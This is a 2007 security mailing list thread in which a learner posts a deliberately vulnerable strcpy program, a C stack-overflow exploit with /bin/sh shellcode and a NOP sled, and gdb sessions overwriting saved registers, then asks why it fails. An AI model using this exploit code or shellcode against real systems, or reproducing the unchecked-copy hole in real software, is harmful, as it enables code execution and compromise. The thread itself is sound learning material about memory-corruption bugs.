Security Basics mailing list archives
RE: stack overflow help ..
From: gaurav saha <gauravsaha007 () yahoo com>
Date: Sun, 28 Jan 2007 03:43:44 -0800 (PST)
yes I read ..
if i write more 4 bytes ..it over writes teh *saved*
eip .. right ??
========= vul1.c ========
[root@winmitm ~]# more a1.c
f(char *str) {
char a[1024];
strcpy(a,str);
}
main(int argc,char *argv[1]) {
if(argc>1) f(argv[1]);
}
====== end of code ===
my exploit code which i wrote for this was ..
===== exploit1.c ======
#include <stdio.h>
#include <string.h>
#define lv_size 1024
#define offset 30+lv_size+8*4
long get_sp()
{
__asm__("movl %esp, %eax");
}
int main(int argc, char **argv)
{
char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
char buffer[lv_size+4*8];
unsigned long *ptr2 = NULL;
char *ptr = NULL;
int i;
printf("1..\n");
// Filling with null
for(i=0;i<lv_size+4*8;i++)
buffer[i]=0x00;
ptr=buffer;
printf("2..\n");
// Filling with NOPs
for(i=0;i<lv_size-strlen(execshell);i++)
*(ptr++)=0x90;
printf("3..\n");
// Filling with shellcode
for(i=0;i<strlen(execshell);i++)
*(ptr++)=execshell[i];
printf("4..\n");
// ptr2 pointing to ptr
ptr2=(long *)ptr;
printf("5..\n");
// Filling with address
for(i=1;i<2;i++)
*(ptr2++)=get_sp()+offset;
execl("/root/vul1", "vul1", buffer, NULL);
}
======== end of my exploit code =======
[root@winmitm ~]# cc expl1.c -o exploit
[root@winmitm ~]# ./exploit
1..
2..
3..
4..
5..
get_sp=bfffe568 and len=4
get_sp+offset=bfffe9a6 and len=4
6..
buffer:<�^^
3VV45V4N
�3��/bin/sh�>
[root@winmitm ~]#
this is what i get ... can u please guide me on what i
am doing wrong ??
thanks
----gaurav
--- "Krpata, Tyler" <tkrpata () bjs com> wrote:
Do an "info frame" in gdb. Remember that you are trying, actually, to overwrite the *saved* EIP value.-----Original Message----- From: listbounce () securityfocus com[mailto:listbounce () securityfocus com]On Behalf Of gaurav saha Sent: Thursday, January 25, 2007 6:27 PM To: security-basics () securityfocus com Subject: stack overflow help .. Hi, i am new to this stack overflow issue. i am using fc3 (kernel 2.6.12-1.1381) i have modified this few sysctl keys to thesevalues.kernel.overflowgid = 0 kernel.overflowuid = 0 fs.overflowgid = 0 fs.overflowuid = 0 kernel.randomize_va_space = 0 i am still unable to overwrite EIP ========= vuln1.c =========== int main(int argc, char **argv) { char buf[1024]; strcpy(buf, argv[1]); return 0; } ====== end of vuln1.c ======= $gcc -ggdb vuln1.c -o v1 $gdb ./v1 . . . . (gdb) run `perl -e 'print "A"x1024'` Starting program: /home/gaurav/test/challenges/challenges/buf/v1`perl-e 'print "A"x1024'` Reading symbols from shared object read fromtargetmemory...(no debugging symbols found)...done. Loaded system supplied DSO at 0xb5c000 (no debugging symbols found)...(no debuggingsymbolsfound)... Program exited with code 0120. (gdb) run `perl -e 'print "A"x1028'` warning: cannot close "shared object read fromtargetmemory": File in wrong format Starting program: /home/gaurav/test/challenges/challenges/buf/v1`perl-e 'print "A"x1028'` Reading symbols from shared object read fromtargetmemory...(no debugging symbols found)...done. Loaded system supplied DSO at 0x247000 (no debugging symbols found)...(no debuggingsymbolsfound)... Program exited with code 0100. (gdb) run `perl -e 'print "A"x1036'` warning: cannot close "shared object read fromtargetmemory": File in wrong format Starting program: /home/gaurav/test/challenges/challenges/buf/v1`perl-e 'print "A"x1036'` Reading symbols from shared object read fromtargetmemory...(no debugging symbols found)...done. Loaded system supplied DSO at 0x807000 (no debugging symbols found)...(no debuggingsymbolsfound)... Program received signal SIGSEGV, Segmentationfault.0x00ac8e0d in __libc_start_main () from /lib/tls/libc.so.6 (gdb) info reg . . ebx 0xbdaff4 12431348 esp 0xbffff350 0xbffff350 ebp 0x41414141 0x41414141 esi 0xbffff3d4 -1073744940 edi 0xbffff360 -1073745056 eip 0xac8e0d 0xac8e0d eflags 0x210286 2163334 . . (gdb) run `perl -e 'print "A"x1040'` Program received signal SIGSEGV, Segmentationfault.0x080483a2 in main () (gdb) i r ebp 0x41414141 0x41414141 eip 0x80483a2 0x80483a2 (gdb) run `perl -e 'print "A"x1044'` Program received signal SIGSEGV, Segmentationfault.0x080483a2 in main () (gdb) i r ebp 0x41414141 0x41414141 eip 0x80483a2 0x80483a2 (gdb) run `perl -e 'print "A"x1048'` Program received signal SIGSEGV, Segmentationfault.0x080483a2 in main () (gdb) i r ebp 0x41414141 0x41414141 eip 0x80483a2 0x80483a2 (gdb) run `perl -e 'print "A"x1052'` Program received signal SIGSEGV, Segmentationfault.0x080483a2 in main () (gdb) i r ebp 0x41414141 0x41414141 eip 0x80483a2 0x80483a2 (gdb) run `perl -e 'print "A"x1056'` Program received signal SIGSEGV, Segmentationfault.0x080483a2 in main () (gdb) i r ebp 0x41414141 0x41414141 eip 0x80483a2 0x80483a2 and this keeps continuing ... no matter how many i increase ... and i can't figure out what problem it is ... thanks and adieu ----gaurav
________________________________________________________________________
____________ Now that's room service! Choose from over 150,000hotelsin 45,000 destinations on Yahoo! Travel to findyour fit.http://farechase.yahoo.com/promo-generic-14795097
____________________________________________________________________________________ Looking for earth-friendly autos? Browse Top Cars by "Green Rating" at Yahoo! Autos' Green Center. http://autos.yahoo.com/green_center/
Current thread:
- stack overflow help .. gaurav saha (Jan 26)
- Re: stack overflow help .. Deian Stefan (Jan 29)
- <Possible follow-ups>
- RE: stack overflow help .. Krpata, Tyler (Jan 26)
- RE: stack overflow help .. gaurav saha (Jan 29)
- RE: stack overflow help .. gaurav saha (Jan 29)